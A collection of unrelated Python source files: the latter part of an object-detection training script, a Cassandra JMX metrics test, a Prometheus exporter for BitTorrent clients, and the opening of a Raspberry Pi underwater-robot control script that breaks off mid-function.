model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(f'Image sizes {imgsz} train, {imgsz_test} test\n'
f'Using {dataloader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(torch.jit.trace(model, imgs, strict=False), []) # add model graph
elif plots and ni == 10 and wandb_logger.wandb:
wandb_logger.log({"Mosaics": [wandb_logger.wandb.Image(str(x), caption=x.name) for x in
save_dir.glob('train*.jpg') if x.exists()]})
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, times = test.test(data_dict,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss,
is_coco=is_coco)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb_logger.wandb:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(model.module if is_parallel(model) else model).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_logger.wandb_run.id if wandb_logger.wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if wandb_logger.wandb:
if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
wandb_logger.log_model(
last.parent, opt, epoch, fi, best_model=best_fitness == fi)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb_logger.wandb:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb_logger.log({"Results": [wandb_logger.wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
# Test best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
for m in (last, best) if best.exists() else (last): # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False,
is_coco=is_coco)
# Strip optimizers
final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
if wandb_logger.wandb and not opt.evolve: # Log the stripped model
wandb_logger.wandb.log_artifact(str(final), type='model',
name='run_' + wandb_logger.wandb_run.id + '_model',
aliases=['last', 'best', 'stripped'])
wandb_logger.finish_run()
else:
dist.destroy_process_group()
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
wandb_run = check_wandb_resume(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.batch_size, opt.global_rank, opt.local_rank = '', ckpt, True, opt.total_batch_size, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size))) # extend to 2 sizes (train, test)
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
prefix = colorstr('tensorboard: ')
logger.info(f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/")
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0), # image mixup (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
|
test_cassandra.py
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_level': None,
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/datadog/collector.log',
'forwarder_log_file': '/var/log/datadog/forwarder.log',
'dogstatsd_log_file': '/var/log/datadog/dogstatsd.log',
'jmxfetch_log_file': '/var/log/datadog/jmxfetch.log',
'go-metro_log_file': '/var/log/datadog/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from dogstatsd import Server
from jmxfetch import JMXFetch
log = logging.getLogger('cassandra_test')
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']])
log.info(metrics)
log.info(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "cassandra.db." in t['metric']]))
log.info(len(metrics))
self.assertTrue(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
exporter.py
|
import time
import os
import sys
import signal
import argparse
import threading
import faulthandler
from wsgiref.simple_server import make_server, WSGIRequestHandler, WSGIServer
try:
from urllib import quote_plus
from BaseHTTPServer import BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from urllib2 import (
build_opener, HTTPError, HTTPHandler, HTTPRedirectHandler, Request,
)
from urlparse import parse_qs, urlparse
except ImportError:
# Python 3
from http.server import BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import (
build_opener, HTTPHandler, HTTPRedirectHandler, Request,
)
import yaml
from loguru import logger
from attrdict import AttrDict
from prometheus_client import start_http_server, Metric, generate_latest, CONTENT_TYPE_LATEST, make_wsgi_app as old_make_wsgi_app
from prometheus_client.core import REGISTRY, CollectorRegistry
from prometheus_client.openmetrics import exposition as openmetrics
from downloader_exporter.deluge_exporter import DelugeMetricsCollector
from downloader_exporter.qbittorrent_exporter import QbittorrentMetricsCollector
from downloader_exporter.transmission_exporter import TransmissionMetricsCollector
def restricted_registry(self, names):
names = set(names)
collectors = set()
metrics = []
with self._lock:
if 'target_info' in names and self._target_info:
metrics.append(self._target_info_metric())
names.remove('target_info')
for name in names:
if name in self._names_to_collectors:
collectors.add(self._names_to_collectors[name])
for collector in collectors:
for metric in collector.collect():
metrics.append(metric)
class RestrictedRegistry(object):
def collect(self):
return metrics
return RestrictedRegistry()
# Monkey patch restricted_registry
CollectorRegistry.restricted_registry = restricted_registry
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return generate_latest, CONTENT_TYPE_LATEST
def bake_output(registry, accept_header, params):
"""Bake output for metrics output."""
encoder, content_type = choose_encoder(accept_header)
if 'name' in params:
registry = registry.restricted_registry(params['name'])
output = encoder(registry)
return str('200 OK'), (str('Content-Type'), content_type), output
def make_wsgi_app(registry=REGISTRY):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
# Prepare parameters
accept_header = environ.get('HTTP_ACCEPT')
params = parse_qs(environ.get('QUERY_STRING', ''))
if environ['PATH_INFO'] == '/favicon.ico':
# Serve empty response for browsers
status = '200 OK'
header = ('', '')
output = b''
else:
# Bake output
status, header, output = bake_output(registry, accept_header, params)
# Return output
start_response(status, [header])
return [output]
return prometheus_app
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
daemon_threads = True
def start_wsgi_server(port, addr='', registry=REGISTRY):
"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, ThreadingWSGIServer, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
# Enable dumps on stderr in case of segfault
faulthandler.enable()
class SignalHandler():
def __init__(self):
self.shutdown = False
# Register signal handler
signal.signal(signal.SIGINT, self._on_signal_received)
signal.signal(signal.SIGTERM, self._on_signal_received)
def is_shutting_down(self):
return self.shutdown
def _on_signal_received(self, signal, frame):
logger.info("Exporter is shutting down")
self.shutdown = True
def main():
parser = argparse.ArgumentParser(description='BT clients stats exporter.')
parser.add_argument('-c', '--config', help='The path to config file', default='/config/config.yml')
parser.add_argument('-p', '--port', type=int, help='The port to use', default=9000)
parser.add_argument('--multi', action="store_true", help='Use different ports for each exporter')
args = parser.parse_args()
with open(args.config, 'r') as f:
config = yaml.safe_load(f)
# Register signal handler
signal_handler = SignalHandler()
# Register our custom collector
counter = 0
logger.info("Exporter is starting up")
for name, c in config.items():
client = c.get('client')
if client == 'qbittorrent':
collector = QbittorrentMetricsCollector(name=name, **c)
elif client == 'deluge':
collector=DelugeMetricsCollector(name=name, **c)
elif client == 'transmission':
collector=TransmissionMetricsCollector(name=name, **c)
else:
logger.warning(f"Unsupported client: {client}, config: {c}")
continue
if args.multi:
logger.info(f"Registering {name} at port {args.port+counter}")
start_http_server(args.port+counter, registry=collector)
else:
logger.info(f"Registering {name}")
REGISTRY.register(collector)
counter += 1
# Start server
if not args.multi:
start_wsgi_server(args.port, registry=REGISTRY)
logger.info(f"Exporter listening on port {args.port}")
while not signal_handler.is_shutting_down():
time.sleep(1)
logger.info("Exporter has shutdown")
if __name__ == '__main__':
main()
|
exp_orbiting.py
|
"""Makes BlueBot around two vertically stacked lights
Contains generic vision based functions that can be used elsewhere including homing and depth control. Also contains depth control using the depth sensor and logger functions.
Attributes:
caudal (): Fin object for caudal fin
depth_ctrl (bool): Depth control from camera, [y/n]
depth_sensor (): DepthSensor object
dorsal (): Fin object for dorsal fin
ema (): EMA filter object
leds (): LED object
lock_depth (int): Depth control from depth sensor, 0=false, int=target_depth
pecto_l (): Fin object for pectoral left fin
pecto_r (): Fin object for pectoral right fin
status (str): BlueBot status in finite state machine
vision (): Vision object
"""
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import os
import csv
import time
import threading
import numpy as np
from math import *
from picamera import PiCamera
from lib_utils import *
from lib_photodiode import Photodiode
from lib_fin import Fin
from lib_leds import LEDS
from lib_vision import Vision
from lib_depthsensor import DepthSensor
from lib_ema import EMA
os.makedirs('./{}/'.format(U_FILENAME))
def initialize():
"""Initializes all threads which are running fins and a logger instance for the overall status
"""
threading.Thread(target=caudal.run).start()
threading.Thread(target=dorsal.run).start()
threading.Thread(target=pecto_l.run).start()
threading.Thread(target=pecto_r.run).start()
# logger instance for overall status
with open('./{}/{}_status.log'.format(U_FILENAME, U_FILENAME), 'w') as f:
f.truncate()
#f.write('t_passed :: t_capture:: t_blob :: t_uvw :: t_pqr :: t_xyz :: distance :: heading :: status\n')
f.write('t_passed :: distance :: heading :: status\n')
leds.on()
time.sleep(1)
leds.off()
def idle():
"""Waiting for starting signal
"""
thresh_photodiode = 20 # lights off: 2, lights on: 400 -> better range!
while photodiode.brightness > thresh_photodiode:
photodiode.update()
def terminate():
"""Terminates all threads which are running fins
"""
caudal.terminate()
dorsal.terminate()
pecto_l.terminate()
pecto_r.terminate()
leds.on()
time.sleep(1)
leds.off()
GPIO.cleanup()
'''
def log_status(t_passed, t_capture, t_blob, t_uvw, t_pqr, t_xyz, distance, heading, status):
with open('./{}/{}_status.log'.format(U_FILENAME, U_FILENAME), 'a') as f:
f.write(
' {:6.3f} :: {:6.3f} :: {:6.3f} :: {:6.3f} :: {:6.3f} :: {:6.3f} :: {:4.0f} :: {:4.0f} :: {}\n'.format(t_passed, t_capture, t_blob, t_uvw, t_pqr, t_xyz, distance, heading, status
)
)
'''
def log_status(t_passed, distance, heading, status):
"""Logs the overall status of BlueBot
Args:
t_passed (float): Time since the beginning of the experiment, [s]
distance (float): Distance to LED pair, [mm]
heading (float): x-position of an LED pair, [mm]
status (string): Status in the finite state machine
"""
with open('./{}/{}_status.log'.format(U_FILENAME, U_FILENAME), 'a') as f:
f.write(
' {:6.3f} :: {:4.0f} :: {:4.0f} :: {}\n'.format(t_passed, distance, heading, status
)
)
def log_centroids(t_passed, side, max_centroids):
"""Logs the (xyz) centroid positions observed in the last vision.update. If fewer than max_centroids are observed, remaining values will be padded with U_CAM_NRES.
Args:
t_passed (float): Time since the beginning of the experiment, [s]
side (string): Right or left robot side
"""
if (side == 'right'):
centroids = vision.xyz_r
elif (side == 'left'):
centroids = vision.xyz_l
centroid_list = U_CAM_NRES * np.ones((3, 3 * max_centroids)) # non-blob entries are set to U_CAM_NRES
if centroids.size:
centroid_list[:centroids.shape[0], :centroids.shape[1]] = centroids
centroid_list = np.transpose(centroid_list)
centroid_list = centroid_list.reshape((1, centroid_list.size))
with open('./{}/{}_centroids_{}.csv'.format(U_FILENAME, U_FILENAME, side), 'a') as f:
writer = csv.writer(f, delimiter=',')
row = []
row.append(t_passed)
#for i in range(blob_list.size):
for i in range(max_centroids):
row.append(centroid_list[0, i])
writer.writerow(row)
def depth_ctrl_from_cam():
"""Controls the diving depth to stay level with an observed object using both cameras. Swithes to depth sensor based depth control when on level with object.
The "pitch" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(p^2 + q^2)). A positive angle switches the dorsal fin on to move down. A negative angles switches the dorsal fin off to move up.
Returns:
(): Floats to the surface if no object observed
"""
pitch_range = 1 # abs(pitch) below which dorsal fin is not controlled
right = vision.pqr_r
left = vision.pqr_l
if not right.size and not left.size:
print('cant see blob')
dorsal.off()
return
if not right.size:
pitch_l = np.arctan2(left[2, 0], sqrt(left[0, 0]**2 + left[1, 0]**2)) * 180 / pi
pitch_r = pitch_l
elif not left.size:
pitch_r = np.arctan2(right[2, 0], sqrt(right[0, 0]**2 + right[1, 0]**2)) * 180 / pi
pitch_l = pitch_r
else:
pitch_r = np.arctan2(right[2, 0], sqrt(right[0, 0]**2 + right[1, 0]**2)) * 180 / pi
pitch_l = np.arctan2(left[2, 0], sqrt(left[0, 0]**2 + left[1, 0]**2)) * 180 / pi
pitch = (pitch_r + pitch_l) / 2
print(pitch)
if pitch > pitch_range:
print('move down')
dorsal.on()
elif pitch < -pitch_range:
print('move up')
dorsal.off()
# pressure sensor takeover. is not distance invariant, so start only when orbiting at fixed distance
if status == 'orbit' and abs(pitch) < pitch_range:
depth_sensor.update()
global lock_depth
lock_depth = depth_sensor.depth_mm # i.e., lock_depth not false anymore
global depth_ctrl
depth_ctrl = False
def depth_ctrl_from_depthsensor(thresh=2):
"""Controls the diving depth to a preset level
Args:
thresh (int, optional): Threshold below which dorsal fin is not controlled, [mm]
"""
depth_sensor.update()
if depth_sensor.depth_mm > (lock_depth + thresh):
dorsal.off()
elif depth_sensor.depth_mm < (lock_depth - thresh):
dorsal.on()
def home():
"""Controls the pectoral fins to follow an object using both cameras
